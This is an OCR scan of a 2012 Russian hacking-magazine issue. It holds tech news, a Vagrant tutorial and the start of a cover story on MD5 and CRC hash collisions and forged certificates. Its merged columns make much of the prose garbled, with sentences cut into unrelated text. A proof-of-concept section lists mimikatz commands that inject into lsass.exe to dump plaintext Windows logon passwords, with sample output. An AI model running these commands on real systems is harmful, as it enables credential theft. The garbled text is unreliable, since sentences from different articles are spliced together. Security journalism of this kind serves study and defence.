ложили запись разговора на YouTube, где она доступна до
сих пор: youtu.be/pl3spwzUZfQ.
Кроме того были опубликованы фрагменты переписки
по электронной почте между Скотланд-Ярдом и ФБР, где
прекрасно видны адреса остальных участников конфе-
ренции (pastebin.com/8G4jLha8).
ФБР уже подтвердило факт перехвата информации и за-
являет, что разыскивает виновников. Подразделение по
последнее время мы частенько упоминаем на страницах журнала борьбе с киберпреступностью Скотланд-Ярда также сооб-
В QR-коды, да и сами нередко пользуемся ими в жизни. Технология дей-
ствительно удобная и, соответственно, набирающая популярность.
щает, что инцидент расследуется. Правоохранительным
органам явно очень интересно, каким образом Анонимы
Но, думаем, многие согласятся с тем, что не всегда удобно пытаться навести смогли заполучить запись.
камеру смартфона на какой-либо объект, переживая о том, хорошо ли его
видно. Команде стартапа Sonic Notify (sonicnotify.com), очевидно, не давала по-
коя та же мысль, и из нее родилась новая технология — своеобразный аналог
QR-кодов. Звуковой.
По задумке разработчиков, устройства на базе iOS и Android могут на
ультразвуковых частотах обмениваться данными небольшого объема. К при-
меру, возможностей Sonic Notify вполне достаточно для передачи ссылки и ее
мгновенного открытия на телефоне.Кроме того, ультразвуковой сигнал можно
интегрировать в любой музыкальный трек или звуковую дорожку видеороли-
ка, чтобы слушатель мог получить доступ к дополнительной информации.
Метаданные можно встроить в любую аудиотрансляцию, что, по мнению
создателей, будет востребовано в музеях или выставочных галереях, для
обеспечения посетителей разнообразными сведениями об экспонатах и их
авторах. На концертах технология позволит, к примеру, открыть сайт испол-
нителя, или обнаружить страницу с текстом исполняемой песни. Признаемся,
нам на ум почему-то приходят не музеи и галереи, а несколько иные варианты
применения технологии :).

СУД ОБЯЗАЛ «ВКОНТАКТЕ» 15 АПРЕЛЯ YOTA ЗАПУ- ВЛАСТИ ШТАТА НЕВАДА В ПЕРВЫЕ ЧАСЫ ПОСЛЕ УСПЕШНУЮ DDOS-АТАКУ
выплатить компенсацию СТИТ В МОСКВЕ СЕТЬ LTE, ПРИНЯЛИ ИСТОРИЧЕСКОЕ СПЕЦОПЕРАЦИИ ПО ЗА- НА САЙТЫ АМЕРИКАНСКИХ
в размере 220 000 рублей работающую на частотах РЕШЕНИЕ: официально КРЫТИЮ MEGAUPLOAD, про- ФОНДОВЫХ БИРЖ NASDAQ,
ввиду нарушения прав интел- 2500-2530 МГц и 2620-2650 разрешили езду по трассам шедшей 19 января, трафик BATS и других осуществила
лектуальной собственности МГц. Переход с WiMAX на LTE общего назначения роботи- всемирной сети снизился группа LONGwave99. Таким
на композиции группы «Ин- состоится в ночь с 14 на 15 зированным автомобилям на 2-3%, говорят эксперты образом хакеры поддержа-
финити» и певицы Максим. апреля. без водителя. DeepField Networks. ли «движение 99%».

012 ХАКЕР 04 /159/ 2012

 НОВАЯMAC OS X 10.8 — Mountain Lion («горный лев») появится в продаже в конце лета 2012 года.

КАК ВЫЖИВАЕТ RAPIDSHARE ВЗЛОМ GOOGLEWALLET

АДВОКАТ ИЗВЕСТНОГО ФАЙЛООБМЕННИКА ДАЛ ИНТЕРВЬЮ ПОДБИРАЕМ PIN К ВИРТУАЛЬНОМУ БУМАЖНИКУ

egaUpload закрыли, другие файловые хостинги здорово напуганы, лектронную платежную систему Google Wallet
M ноRapidShare в это время живет и здравствует.А ведь всего два года
назад файлообменник упоминался в докладе RIAA и MPAA, как одно из
Э запустили еще в середине 2011 года. Разработка
предназначена для Android-смартфонов, имею-
«известных мест» по размещению пиратского контента. Как «рапиде» удалось щих NFC. Используется данная система для платежей
уйти из-под прицела правообладателей, рассказал ресурсу TorrentFreak по беспроводной связи малого радиуса действия. То
адвокат компании Дэниел Реймер. Приведем самые интересные тезисы из его есть Google Wallet позволяет расплачиваться за покупки
рассказа: в магазинах с помощью телефона и установленного на нем
RapidShare всегда по первому требованию правообладателей удаляет специального приложения. Это не что иное, как «вирту-
любые файлы, размещенные у них на хостинге. Этим занимается специальный альный бумажник».
отдел — anti-abuse department. Кстати, подобная технология используется для оплаты
Компания разработала специальный краулер, который постоянно монито- проезда в Лондонском метро и в метро Японии. Для пере-
рит форумы, доски объявлений и варезные блоги в поиске информации о на- числения средств за покупку или проезд нужно лишь
рушении интеллектуальных прав, которые имеют место в системе RapidShare. провести телефоном рядом с терминалом оплаты.
Собранная информация оценивается, проверяется и обрабатывается все тем Вопрос безопасности подобных платежных систем
же отделом. Конечно, Реймер отказался сообщить подробности о краулере или всегда был актуальной темой. Google заверял, что Google
назвать идентификатор бота. Но отметил, что это «весьма сложная техноло- Wallet отлично защищен, — к примеру, использует микро-
гия», способная обойти практически любые способы защиты форумов от неза- схему Secure Element, где в зашифрованном виде хранит
регистрированных пользователей. пользовательские данные. Она отделена от самого теле-
Еще в декабре 2010 года компания потратила большие деньги, наняв высо- фона и ОС, так что только Google Wallet может работать
кооплачиваемую вашингтонскую фирму Dutko, которая имеет доступ в высшие с ней.
эшелоны власти и там отстаивает интересы RapidShare.В задачу Dutko также Но, как показывает практика, все, что создано
входит работа над имиджем RapidShare. и защищено человеком, может быть им же и взломано.
Еще один важный козырь живучего файлообменника — отсутствие пар- Оказалось, подобрать PIN-код к кошельку можно путем
тнерской программы. Таковые, по мнению правообладателей, стимулируют брутфорса, даже без обращения к серверу Google! Виной
пиратство. всему — уязвимости в архитектуре приложения.
Специалист по безопасности Джошуа Рубин, сотруд-
В RapidShare
уверены: файловый ник zveloLABS, решил внимательно изучить внутреннюю
хостинг должен базу данных sqlite3, где Google Wallet хранит всю информа-
выглядеть как цию. В базе обнаружилась таблица со странным названи-
приличный сервис
вроде Dropbox'а, как ем metadata. В таблице было всего три строки, но в каждой
респектабельная из них — крупный блок бинарных данных.
компания, которая
занимается исклю-
Один ряд называется gmad_bytes_are_fun — это нечто
чительно легальным вроде зашифрованной файловой системы для хранения
бизнесом. данных. Содержимое бинарных данных в этой строке явно
предполагает, что там находится вся информация о бан-
ковской карте, пишет Рубин.
Другая строка называется deviceInfo, и для понимания
этих данных пришлось выяснить, чем они обработаны.
Данные оказались скомпилированы при помощи про-
токола Protocol Buffers. Это открытая библиотека для уни-
фикации данных в сообщениях между системами. Чтобы
прочитать эти данные, необходимо указать правильный
messageformat в файле .proto (Protocol BufferBasics: Java).
Сделав подходящий .proto, Джошуа Рубин сумел прочесть
данные и был глубоко шокирован. Обнаружились Unique
User IDs (UUID), информация об аккаунтах Google (GAIA)
и Cloud to DeviceMessaging (C2DM, пуш-уведомления),
ОБНОВИЛСЯ ЛЕГЕНДАРНЫЙ МЕДИАПЛЕЕР статус Google Wallet Setup, параметр «TSA» (видимо,
Trusted Services), статус SE, и самое главное — данные
CardProduction Lifecycle (CPLC) и PIN-код!
Хэш PIN-кода хранится в зашифрованном виде
в SHA256. Но зная длину PIN-кода (а это четыре цифры),
VLC ОБНОВИЛСЯ ДО достаточно попробовать максимум 10 000 хэшей SHA256,
так что криптографическая защита перестает быть про-
ВЕРСИИ 2.0 TWOFLOWER. блемой. PIN-код подбирается менее чем за секунду даже
на смартфоне, так что смысл ограничения на пять попыток
СРЕДИ УЛУЧШЕНИЙ: ввода на сервере полностью теряется, как и смысл всей
системы безопасности Google Wallet вообще. Эксперт
ЭКСПЕРИМЕНТАЛЬНАЯ zveloLABS сообщает, что разработчики Google уже про-
информированы об уязвимости и сейчас стараются как
ПОДДЕРЖКА ДИСКОВ можно быстрее закрыть дыру. Посмотреть, как Рубин
демонстрирует уязвимость, можно здесь:
BLU-RAY И НОВЫХ ФОРМАТОВ. youtu.be/P655GXnE_ic.

ХАКЕР 04 /159/ 2012 013

MEGANEWS ВЫШЕЛ GOOGLE CHROME BETA ДЛЯ ANDROID 4-Й ВЕРСИИ. Интересно, что браузер не поддерживает flash.

ДОВЕРИЕ К SSL- ЦЕНЗУРА В TWITTER

СЕРТИФИКАТАМ ПАДАЕТ И BLOGGER
ПРОШТРАФИЛСЯ ЕЩЕ ОДИН УДОСТОВЕРЯЮЩИЙ ЦЕНТР ИНТЕРНЕТ-КОМПАНИИ БУДУТ
ВЫБОРОЧНО ФИЛЬТРОВАТЬ КОНТЕНТ

Компания Google
планирует вообще
отключить онлай-
новые проверки
аннулированных
SSL-сертификатов
в будущих версиях
Chrome. Их заменят
офлайновой базой
аннулированных
сертификатов, об-
новляться которая
будет через со-
фтверные апдейты.

е поднимая шума, компания Twitter объявила о том, что

Н впредь будет блокировать сообщения пользователей в «от-
дельных странах», чтобы авторы не нарушали принятые там
чередной камешек упал в огород сертификатов SSL в част- нормы. Такое сообщение появилось в корпоративном блоге Twitter.
O ности и всех нынешних центров сертификации в целом.
Центр сертификации Trustwave признал факт выдачи такого
Там же поясняется, что по мере расширения сервиса, он становит-
ся доступен в странах, где иначе смотрят на «пределы свободы
сертификата коммерческой компании для ее корпоративной сети. самовыражения». В некоторых странах эти пределы таковы, что
Сразу после этого был создан соответствующий тикет в Bugzilla, и на- существовать там Twitter не может вовсе, нужна «географическая
чалось активное обсуждение в группе mozilla.dev.security.policy. Если цензура». Пока компания не прибегала к новым возможностям,
удостоверяющий центр ради коммерческой выгоды позволяет себе подчеркивается в блоге. Разумеется, пользователи не замедлили
выдать корневой сертификат некой непонятной компании, это дей- выразить свое возмущение этим нововведением, и протест под-
ствительно может обернуться непредсказуемыми последствиями. держало движение Anonymous. Ситуацию поспешил прокоммен-
Фирма может подписать что угодно, не обращаясь в удостоверяющий тировать исполнительный директор Twitter Дик Костоло. По его
центр, и становится возможной атака типа man-in-the-middle и даже словам, система фильтрации твитов (или целых аккаунтов) нужна
прослушка защищенного трафика по SSL/TLS. не для осуществления цензуры, а для того, чтобы сервис вообще
В итоге проект Mozilla разослал всем удостоверяющим центрам, смог продолжить работу в определенных государствах. Сообщения
корневые сертификаты которых поставляются в составе Firefox будут фильтроваться исключительно по запросу властей и только
и других продуктов Mozilla, письмо с требованием отозвать все вы- для пользователей сервиса в конкретной стране. Слабое какое-то
данные сторонним организациям вторичные корневые сертификаты утешение.
и уничтожить используемые для хранения этих сертификатов HSM- Буквально на следующий день после этого заявления еще и Google
модули. Удостоверяющие центры должны выполнить эти требования сообщил, что отныне компания тоже может блокировать доступ к от-
до 27 апреля. Если же требования не будут исполнены, Mozilla грозит- дельным блогам, создаваемым на сервисе Blogger, по требованию
ся исключить сертификаты всех недобросовестных удостоверяющих правительств определенных стран мира. Впрочем, Google хотя бы
центров из своего списка. оставляет читателям блогов возможность отключить переадресацию.

WOLFRAM ALPHA — БАЗА

ЗНАНИЙ И НАБОР ВЫЧИС-
ЛИТЕЛЬНЫХ АЛГОРИТМОВ,
которую часто ошибочно
называют поисковиком, под-
верглась самому значительно-
му обновлению за последние
годы. Была представлена про-
двинутая версия Wolfram Alpha ПО ДАННЫМ OCCASSIONAL INTEL ПРЕДСТАВИЛА про-
Pro. Подписка на Pro-версию GAMER, большая часть цессоры Core i5-2380P, i5-
обойдется в 4,99$ в месяц рынка смартфонов на базе 2450P и i5-2550K на микро-
(2,99$ для студентов), но Windows Phone 7 (55%) при- архитектуре Sandy Bridge.
сейчас также предоставляется надлежит HTC. Следом идут Главное отличие новинок—
и бесплатный тестовый период Samsung (28%), LG (12%) заблокированный GPU.
длительностью 14 дней. и Nokia (4%).

014 ХАКЕР 04 /159/ 2012

ОБ ОКОНЧАНИИ СЛУШАНИЙ
ПО ДЕЛУ THE PIRATE BAY И НЕ
ТОЛЬКО
ПОСЛЕДНИЕ СВОДКИ О ПОПУЛЯРНОМ ТРЕКЕРЕ

«Качайте мои книги бесплатно

и, если они вам понравятся,
купите бумажную копию. Это
верный путь заявить индустрии
о том, что жадность ведет в ни-
куда». Пауло Коэльо.

ак известно, судебный процесс — штука не быстрая. Раз-

К бирательство в отношении администрации «Пиратской
бухты» исключением из этого правило не являлось — суд
длился с 2008 года.
Новость, пришедшая в начале февраля, подводит под этим про-
цессом определенную черту (хотя и нельзя сказать, что все кончилось).
Дело в том, что четверо основателей The Pirate Bay проиграли в Верхов-
ном суде Швеции свою последнюю попытку апелляции. Суд отклонил
их апелляцию, оставив в силе приговор от ноября 2010 года, который
предусматривает тюремные сроки 4, 8 и 10 месяцев, а также возмеще-
ние правообладателям ущерба в размере 46 миллионов крон (около
6,8 млн долларов). По идее, теперь Готтфрид Свартхольм, Фредерик
Нейж, Питер Сунде и Карл Лундстрем должны отправиться в тюрьму.
Утешает лишь то, что в виду нюансов шведской судебной системы
(а также потому, что некоторые из обвиняемых более не проживают
в Швеции) основатели TPB не намереваются ни отбывать срок, ни пла-
тить деньги. Напротив, они планируют обратиться в Суд Европейского
союза и бороться дальше. Хотя сам ThePirateBay.org в приговоре суда
не фигурирует, и прямого постановления о его закрытии нет, нынешняя
администрация (к которой упомянутая четверка уже не относится, на
данный момент в команде не осталось ни одного из тех, кто начинал это
дело), решила перестраховаться. Самые внимательные наши читатели
наверняка заметили, что в феврале трекер переехал в шведскую до-
менную зону .SE, где и остается на момент написания этих строк. Таким
образом «Пиратскую бухту» укрывают от американских правоохрани-
тельных органов, которые тоже давно точат зуб на популярный ресурс.
По тем же причинам TPB в этом месяце начал активный переход
на magnet-ссылки вместо torrent-файлов. Если на серверах «Бухты»
не будет ничего криминального, даже torrent-файлов (каковые,
в общем, тоже не являются чем-то плохим, но это еще нужно до-
казывать в суде), обороняться трекеру станет еще легче. К тому же,
это позволяет здорово экономить место на серверах. Пользователи
torrentfreak.com уже проверили последнее утверждение: по их
данным, общий размер базы трекера сейчас составляет всего 164
мегабайта, или 90 мегабайт в архивированном виде! Вот уж дей-
ствительно, компактность налицо. Но, помимо судов и переездов,
администрация «Бухты» по-прежнему борется за свободу инфор-
мации в целом. Яркий тому пример — эксперимент по продвижению
писателей, музыкантов и других творцов — The Promo Bay. Первым
«продвигаемым» (хотя, конечно, скорее это он продвигал данный
проект) стал писатель Пауло Коэльо, чье лицо недавно можно было
наблюдать на главной странице The Pirate Bay. Оказывается, Пауло
тоже не одобряет SOPA и пишет, что продажи его бумажных книг
только выросли с тех пор, как читатели разместили их на P2P-
сайтах. В целом, авторские раздачи не новость, но такой рекламы
им, пожалуй, еще никто не делал. Коэльо призвал всех творческих
людей поддержать идею трекера.

ХАКЕР 04 /159/ 2012 015

HEADER

КОЛОНКА СТЁПЫ ИЛЬИНА

О БЫСТРОМ СОЗДАНИИ
ВИРТУАЛЬНЫХ МАШИН
ЗАДАЧА команда «box add <имя виртуальной машины>»
Один из важных плюсов облачных серви- отвечает непосредственно за создание вирту-
сов — возможность быстро поднять столько альной машины.
серверов, сколько нужно. Хочешь два — будет В качестве параметра ей передается путь
тебе два. Хочешь сто — два клика мышью и до специального box-файла — контейнера,
будет сто. Все зависит только от твоего ко- позволяющего быстро развернуть на вирту-
шелька, платформа же позволяет развернуть альной машине нужную ОС. Мы указали не
столько виртуальных серверов (с нужными просто путь, а ссылку: в этом случае Vagrant
ресурсами), сколько тебе нужно. С виртуаль- сам выкачивает из сети образ.
ной машиной на домашнем компьютере такой Команда «init» инициализирует ОС, причем
фокус не проходит. Чтобы создать виртуалку, в качестве параметра необходимо указать
задать ей нужные настройки и, что муторнее тип системы: в нашем случае это 32-битная Запуск виртуальной машины через Vagrant
всего, установить ОС, уходит уйма време- Ubuntu Lucid (10.04).После выполнения этих
ни. В один момент мне стало интересно: а двух команд создается полностью работоспо-
можно ли как-то автоматизировать процесс и собная виртуальная машина с 512 Мб на борту.
разворачивать новые виртуальные машины Последняя команда — «vagrant up» — лишь
по-настоящему быстро? Ну, то есть указать запускает ее в фоновом режиме.
что-то вроде: «Хочу три виртуальные машины Таким образом можно создавать и запу-
с такими-то настройками и установленную на стить нужное количество виртуалок. Управ-
них Ubuntu последней версии» — и получить лять всем этим хозяйством можно опять же
эти три виртуальные машины без лишнего через консоль Vagrant. Работающую виртуаль-
геморроя. В поисках подходящего решения ную машину можно оставить:
я наткнулся на открытый проект Vagrant
(vagrantup.com). vagrant suspend
Чтобы посмотреть статус каждой из вир-
РЕШЕНИЕ туальной машины, есть специальная команда
Используя в качестве основы бесплатный для мониторинга:
и потому особенно любимый нами Oracle's
VirtualBox (4.0.x или 4.1.x), Vagrant позволяет vagrant status
создавать и конфигурировать виртуальные
машины динамически. К любой из гостевых ОС можно подклю- На сайте vagrantbox.es доступны образы разных ОС для
быстрого развертывания
Как это происходит, предлагаю рассмотреть читься по SSH, используя сам Vagrant:
прямо на примере. Загружаем с downloads.
vagrantup.com нужную версию дистрибутива vagrant ssh
(есть версии для Windows, Linux, Mac OS X) и
поднимаем наш первый инстанс (виртуальную Если запустить приложение без параме-
машину): тров, то оно выдаст список всех доступных
команд.
$ vagrant box add lucid32 http://files. Параметры гостевых ОС можно отконфигу-
vagrantup.com/lucid32.box рировать (например, прописать статические
$ vagrant init lucid32 IP), задав нужные настройки в специальном
$ vagrant up скрипте Vagrantfile, который пишется на Ruby.
С его же помощью можно, к примеру, про-
Три команды — и новая виртуальная бросить порты до нужной тебе виртуальной
машина с установленной ОС запущена (если, машины. И, конечно же, ты можешь создавать
конечно, ты не забыл предварительно уста- свои box-файлы, из которых далее быстро раз-
новить VirtualBox)! Как несложно догадаться, вертывать гостевые ОС. Код проекта написан на Ruby

016 ХАКЕР 04 /159/ 2012

 Proof-of-Concept
ИЗВЛЕЧЬ ПАРОЛИ ПОЛЬЗОВАТЕЛЕЙ
WINDOWS ИЗ ПАМЯТИ

Существует немало способов и специальных утилит, чтобы

извлечь хэши пользовательских паролей из системы.
А можно извлечь пароль в открытом виде? Можно!

О ЧЕМ РЕЧЬ? КАК ЭТО ВЫГЛЯДИТ?

Не так давно мы делали комплексный материал о том, как можно Попробуем mimikatz. Вывод будет на французском языке, но тебя
сдампить пользовательские пароли из Windows-системы. Ути- это не должно пугать: чтобы увидеть пароли, не нужно говорить на
лита Windows Credentials Editor – одно из наиболее известных языке Шарля Де Голля:
и универсальных решений. Однако недавно французские ис-
следователи выпустили совершенно убойную наработку mimikatz mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */
(blog.gentilkiwi.com/mimikatz). Помимо уже известных приемов,
она умеет... извлекать пароли пользователей в открытом виде. mimikatz # privilege::debug
Правда, только тех, которые осуществили вход в системе. Сна- Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
чала мы подумали, что это фэйк и подстава, но первый же запуск
утилиты подтвердил — все работает. Прога предоставляет свою mimikatz # inject::process lsass.exe sekurlsa.dll
собственную консоль, из которой можно запустить необходимые PROCESSENTRY32(lsass.exe).th32ProcessID = 488
модули для различных ситуаций (концепция «швейцарского Attente de connexion du client...
ножа»). Для извлечения паролей в виде открытого текста понадо- Serveur connecté à un client !
бится всего три команды: Message du processus :
Bienvenue dans un processus distant
mimikatz # privilege::debug Gentil Kiwi
mimikatz # inject::process lsass.exe sekurlsa.dll
mimikatz # @getLogonPasswords SekurLSA : librairie de manipulation des données de sécu-
rités dans LSASS

mimikatz # @getLogonPasswords

Authentification Id : 0;434898
Package d'authentification : NTLM
Utilisateur principal : Gentil User
Domaine d'authentification : vm-w7-ult
msv1_0 : lm{ e52cac67419a9a224a3b108f-
3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
wdigest : password
tspkg : password

КАК ЭТО РАБОТАЕТ?

Казалось бы: нафига хранить пароли в открытом виде, если вы-
полнить авторизацию можно даже с помощью хэша? На самом
деле, последнее возможно не везде. Поэтому в винде есть специ-
альный поставщик безопасности wdigest (technet.microsoft.com/
en-us/library/cc778868(WS.10).aspx), чтобы поддерживать такие
типы авторизации как, например, HTTP Digest Authentication
и другие схемы, где необходимо знать пароль (и хэша недоста-
точно). Напоследок скажу, что буквально в момент выхода жур-
нала в печать аналогичный функционал появился и в упомянутой
Французский вывод mimikatz не должен тебя пугать выше утилите WCE. z

ХАКЕР 04 /159/ 2012 017

COVERSTORY Sanjar Satsura ([email protected], twitter.com/sanjar_satsura)

В современном IT-мире контрольную сумму файла

или любых других важных данных принято считать
фундаментом для подтверждения неизменности
исходной информации. Но если ты вспомнишь
историю с руткитом Stuxnet, то поймешь, что
уязвимости в популярных алгоритмах для
расчета таких сумм могут привести к большим
катастрофам. Давай проверим это.

ОПАСНЫЙ
018 ХАКЕР 04 /159/ 2012
 Опасный двойник

DVD WARNING
На нашем диске ты Вся информация
найдешь исходники, предоставлена
описанные исключительно
в статье, примеры в ознакомительных
поддельных целях. Ни редакция,
сертификатов, ни автор не несут
а также видео, ответственности за
в котором наглядно любой возможный
показан процесс вред, причиненный
генерации коллизий. материалами данной
статьи.

ЛЕГКИЙ
СПОСОБ
ПОДДЕЛКИ
КОНТРОЛЬНОЙ
СУММЫ И ЭЦП
С ПОМОЩЬЮ
КОЛЛИЗИЙ

ДВОЙНИК
ХАКЕР 04 /159/ 2012 019
COVERSTORY

Теория
Всегда ли ты проверяешь контрольную сумму скачанных из сети же хэш-сумму, что и y. В частности, для входного значения 38 той
файлов? Думаю, нет. Хотя, конечно, для большинства юниксоидов это же хэш-суммой будут обладать входные значения 57, 76 и так далее.
привычное дело, ведь целостность и достоверность скачанных обра- Таким образом, пары входных значений (38,57), (38,76) образуют
зов и исходников порой играет важную роль. Достаточно вспомнить коллизии для хэш-функции F(x).
недавний взлом kernel.org: тогда лишь самые опытные админи- Чтобы хэш-функция F считалась криптографически стойкой,
страторы заметили подвох, сравнив контрольную сумму скачанных она должна удовлетворять трем основным требованиям, на которых
исходников с контрольной суммой, представленной на сайте. основано большинство применений хэш-функций в криптографии.
Ты наверняка знаешь, что контрольная сумма файла зачастую 1. Необратимость: для заданного значения хэш-функции m должно
представляет собой криптографические хэш-функции, самыми из- быть практически невозможно найти блок данных x, для которого
вестными из которых являются MD4, MD5 и SHA-1. Однако с недавних F(x)=m.
пор встала огромная проблема подтверждения целостности исходной 2. Стойкость к коллизиям первого рода: для заданного сообщения
информации при помощи более криптостойких алгоритмов хэширова- m должно быть практически невозможно подобрать другое со-
ния (контрольных сумм). Имя этой проблемы — коллизии криптогра- общение n, для которого F(n) = F(m).
фических хэш-функций. Так, например, если хэш-функция исполь- 3. Стойкость к коллизиям второго рода: должно быть практически не-
зуется для создания цифрового ключа, то умение строить для нее возможно подобрать пару сообщений, имеющих одинаковый хэш.
коллизии равносильно умению подделывать цифровой ключ! Именно
поэтому в идеале не должно существовать способа поиска коллизий Существует большое количество алгоритмов хэширования
для криптографических хэш-функций более быстрого, чем полный с различными характеристиками (разрядность, вычислительная
перебор (брутфорс). Если для некоторой хэш-функции находится более сложность, криптостойкость и так далее). Простейшим примером
быстрый способ, то эта хэш-функция перестает считаться крипто- хэш-функций может служить CRC, который не является алгорит-
стойкой, а также использоваться для передачи и хранения секретной мом хэш-функции, а представляет из себя алгоритм вычисления
информации. Но всегда ли это так? Оказывается, далеко не всегда. контрольной суммы. По скорости вычисления он в десятки и сотни
раз быстрее, чем криптографические хэш-функции, а также
МАТЧАСТЬ значительно проще в аппаратной реализации. Однако платой за
Итак, коллизией хэш-функции F называются два различных входных высокую скорость является возможность легко подогнать большое
блока данных — x и y — таких, что F(x) = F(y). Рассмотрим в качестве количество сообщений под заранее известную сумму. Так разряд-
примера хэш-функцию F(x) = x|19|, определенную на множестве це- ность контрольных сумм (типичное число — 32 бита) ниже, чем
лых чисел. Ее ОДЗ (из школьного курса математики ты должен знать, у криптографических хэшей (типичные числа: 128, 160 и 256 бит), что
что это такое) состоит из 19 элементов (кольца вычетов по модулю 19), означает возможность возникновения непреднамеренных коллизий.
а область определения стремится к бесконечности. Так как множе- В качестве примера можно привести следующий код на C, демон-
ство прообразов заведомо больше множества значений, коллизии стрирующий получение трех CRC-коллизий на 100 000 итераций:
обязательно существуют. Что это значит? Давай построим коллизию
для этой хэш-функции, используя входное значение 38, хэш-сумма #include <stdio.h>
которого равна нулю. Так как функция F(x) периодическая с периодом #include <unistd.h>
19, то для любого входного значения y значение y+19 будет иметь ту #include <stdlib.h>
#define INTERATION 100000
int main(){
int count =0;
int i,j;
ТАБЛИЦА ХЭШ-ФУНКЦИЙ, ДЛЯ unsigned hash;
КОТОРЫХ БЫЛИ НАЙДЕНЫ КОЛЛИЗИИ char c;
unsigned* table;
Скорость шифрования table = calloc(INTERATION,sizeof(unsigned));
Алгоритм Длинна хэш-значения
(Кбайт/с)
for(i = 0; i< INTERATION; i++){
Одновременная схема Davies-Meyer (c IDEA) 128 22
hash = 0;
Davies-Meyer (c DES) 64 9
for(j=0; 32 > j;j++){
Хэш-функция ГОСТ 256 11 c = 33 + (char) (63.0*rand()/(RAND_MAX+1.0));
HAVAL (3 прохода) переменная 168 hash = (hash * 33) + c;
HAVAL (4 прохода) переменная 118 }
HAVAL (5 прохода) переменная 95 hash = hash + (hash >> 5);
MD2 128 23 for(j=0; i > j ;j++) if (table[j] == hash) count++;
MD4 128 236 table[i]=hash;
MD5 128 174 }
N-хэш (12 этапов) 128 29
free(table);
N-хэш (15 этапов) 128 24
printf("%d values %d collisions\n",INTERATION, count);
return 0;
RIPE-MD 128 182
}
SHA 160 75
Snerfu (4 прохода) 128 48
Среди множества существующих хэш-функций принято осо-
Snerfu (8 проходов) 128 23
бенно выделять криптографически стойкие, - они применяются
Таблица хэш-функций, для которых были найдены коллизии в криптографии. К примеру, существуют два наиболее часто

020 ХАКЕР 04 /159/ 2012

 Опасный двойник

IV — начальное значение буфера, а L1 и L2 — различные сообще-

ния. Например, если взять начальное значение буфера

A = 0x12AC2375
В = 0x3B341042
C = 0x5F62B97C
D = 0x4BA763ED

и задать входное сообщение

AA1DDABE D97ABFF5 BBF0E1C1 32774244

1006363E 7218209D E01C136D 9DA64D0E
98A1FB19 1FAE44B0 236BB992 6B7A779B
1326ED65 D93E0972 D458C868 6B72746A

то добавляя число 2^9 к определенному 32-разрядному слову

в блочном буфере, можно получить второе сообщение с таким же
Проверка подлинности сертификата на VeriSign
хэшем. Есть несколько программ, которые помогут тебе все это
дело провернуть (обрати внимание на ссылки в боковом выносе).
встречающихся в повседневной жизни алгоритма: MD4 и MD5.
В плане безопасности MD5 является более надежным, чем его МЕТОДЫ ПОЛУЧЕНИЯ ПРОФИТА
предшественник MD4. В новый алгоритм разработчики добавили Перед тем как начать практическую часть, мы должны добить
еще один раунд — теперь вместо трех их стало четыре. Также была теорию. Дело в том, что так называемые коллизии мы можем
добавлена новая константа, чтобы свести к минимуму влияние использовать в качестве ключа/пароля для аутентификации в раз-
входного сообщения. В каждом раунде на каждом шаге константа личном ПО и на веб-ресурсах. Это значит, что даже без знания па-
всегда разная, она суммируется с результатом F и блоком данных. роля, имея на руках только лишь его хэш, мы можем сгенерировать
Изменилась функция G = XZ v (Y not(Z)) (вместо XY v XZ v YZ). Резуль- правдоподобный пассворд с помощью коллизии, причем за вполне
тат каждого шага складывается с результатом предыдущего, из-за приемлемое время. Однако на данный момент существуют и по-
этого происходит более быстрое изменение результата. Изменился всеместно используются лишь несколько видов «взлома» хэшей
порядок работы с входными словами в раундах 2 и 3. Даже неболь- MD4/5, то есть подбора сообщения с заданным хэшем.
шое изменение входного сообщения (в нашем случае на один бит: 1. Перебор по заданному словарю: никаких гарантий удачного
ASCII символ «5» с кодом 0x3516 = 0001101012 заменяется на символ результата нет, из плюсов можно отметить лишь малое время,
«4» с кодом 0x3416 = 0001101002) приводит к полному изменению затраченное на перебор.
хэша. Такое свойство алгоритма называется лавинным эффектом. 2. Брутфорс: банальный перебор случайных или последовательных
Вот так выглядит пример 128-битного (16-байтного) MD5-хэша: комбинаций, большим минусом которого является значительное
количество затраченного времени и ресурсов компьютера.
MD5("md5") = 1bc29b36f623ba82aaf6724fd3b16718 3. RainbowCrack: атака по радужным таблицам является самым
эффективным методом «взлома»; плюс заключается в быстром
Кстати, если говорить конкретно о коллизиях в алгоритме MD5, переборе, минусы — в гигантском размере радужных таблиц
то здесь мы можем получить одинаковые значения функции (F) для и большом количестве времени, затраченном на их генерацию.
разных сообщений и идентичного начального буфера. Так, напри-
мер, для известного сообщения можно построить второе — такое, Для полного перебора или перебора по словарю можно ис-
что оно будет иметь такой же хэш, как и исходное. C точки зрения пользовать, к примеру, следующие программы: PasswordsPro,
математики это означает следующее: MD5(IV,L1) = MD5(IV,L2), где MD5BFCPF, John the Ripper.

WWW
• Об алгоритме MD5:
STUXNET И ПОДДЕЛЬНЫЕ СЕРТИФИКАТЫ bit.ly/awBxKK;
• интересная
статья о коллизиях
(матчасть):
Надеюсь, ты не забыл историю с руткитом Stuxnet, когда на них :). Как бы парадоксально это не было, но существует bit.ly/byRrQu;
• MD5 Collision
троян-дроппер прогружал и запускал в системе свои драйверы, ряд доказательств, подтверждающих мои слова. Во-первых, Generator:
спокойно обходя всяческие системы предотвращения на одном закрытом форуме, где тусовались разработчики этих bit.ly/zLR5Ec;
вторжений и антивирусы? Тогда при реверс-инжиниринге нашумевших руткитов (хотелось бы особо отметить человека под • Evilize:
bit.ly/zEBLmj;
сэмплов выяснилось, что драйверы руткита были подписаны ником orr, статьи которого присутствуют на ряде авторитетных • Rainbow MD5 Crack
«настоящими» сертификатами крупных производителей паблик-ресурсов, посвященных ИБ и реверс-инжинирингу: by Collision Search:
контроллеров и чипов JMicron и Realtek. Было много шума, woodman и openrce), существовал топик о возможности кражи bit.ly/yYRUxl;
• статья Властимила
все кинулись обвинять эти компании в некомпетентности. доверенных сертификатов. В нем приводился пример с Duqu, Климы «О MD5-
Аналогичная история повторилась и с «братом» Stuxnet — сертификат (c закрытым ключом) которого был сгенерирован коллизиях»:
bit.ly/yDQNuY;
червем Duqu. На этот раз обвинили компанию C-Media Electron- с помощью коллизии. Во-вторых, если сравнить два сертификата • HashClash Frame-
ics, сертификаты которой также были якобы украдены. Все (настоящий и тот, что был сгенерирован для Duqu) по размеру, work:
вроде бы верно, но никаких краж возможно и не было! Я думаю, то окажется, что существует хоть и малая, но все же разница bit.ly/722ob;
• научные работы
